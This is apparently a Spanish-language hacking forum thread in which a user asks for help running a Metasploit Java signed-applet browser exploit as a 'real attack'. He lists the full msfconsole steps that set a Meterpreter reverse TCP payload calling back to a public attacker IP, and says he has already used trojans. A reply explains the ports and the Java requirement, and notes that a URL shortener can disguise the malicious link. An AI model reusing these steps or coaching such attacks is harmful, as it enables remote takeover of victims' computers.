Metasploit DUDA ataque real !

Iniciado por Ricardini, Septiembre 14, 2013, 07:18:39 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Septiembre 14, 2013, 07:18:39 AM Ultima modificación: Agosto 16, 2014, 10:44:37 AM por Expermicid
buenas bros queria saber sobre este bug java_apllets es como un payload que ataka via internet mediante metasploit pero no lo entiendo ???????????

preguntas del video ?

primero abre los puertos 4444 y 8080
por que abre el puerto 8080 ese puerto no es para proxys o para servidores ?

otra cosa la victima tiene que tener instalado JAVA para que funke el ataque ?

y no entiendo para que sirve este website para crear un servidor ?
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
segun el video pone la ip publica .. como LHOST

cuando lo abro en otra maquina sale asi y no me da session a de cuenta que la web no me diera respuesta o
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta me sale asi en la maquina atacada



ya intente con troyanos y me fue bien quiero hacer esto alguien quien me pueda ayudar hacer el ataque por favor




pasos del ataque :

use exploit/multi/browser/java_signed_applet

show options

set SRVHOST 192.168.1.9

set URIPATH /

set PAYLOAD windows/meterpreter/reverse_tcp

show options

set LHOST 194.123.77.33 IP PUBLICA


exploit

Bueno primero te diria ponte a leer toda la documentacion necesaria y luego haces tus preguntas ! pero hoy ando de buen humor enserio lee,  te ire respondiendo cada pregunta que hiciste.

por que abre el puerto 8080 ese puerto no es para proxys o para servidores ?

El puerto 8080 es usada para la conexion a tu servidor donde (segun lo que puede hacer el ataque no vi el video) es para que la victima pueda acceder a tu equipo y poder lanzar el exploit.

otra cosa la victima tiene que tener instalado JAVA para que funke el ataque ?

Obvio que si aun mas la version de Java especifica por la cual es afectada con este exploit.

y no entiendo para que sirve este website para crear un servidor ?
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
segun el video pone la ip publica .. como LHOST


Simple el Tinyurl es un acortador de URL el cual puedes realizar algo como esto ->No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

cuando lo abro en otra maquina sale asi y no me da session a de cuenta que la web no me diera respuesta o
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta me sale asi en la maquina atacada

No es necesario que uses TyniURL para hacer el ataque es mejor que lo hagas sin ello primero para poder probar, segundo tu maquina verifica que tenga Java.

Cualquier duda te la responderemos en el foro.

Regards,
Snifer
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!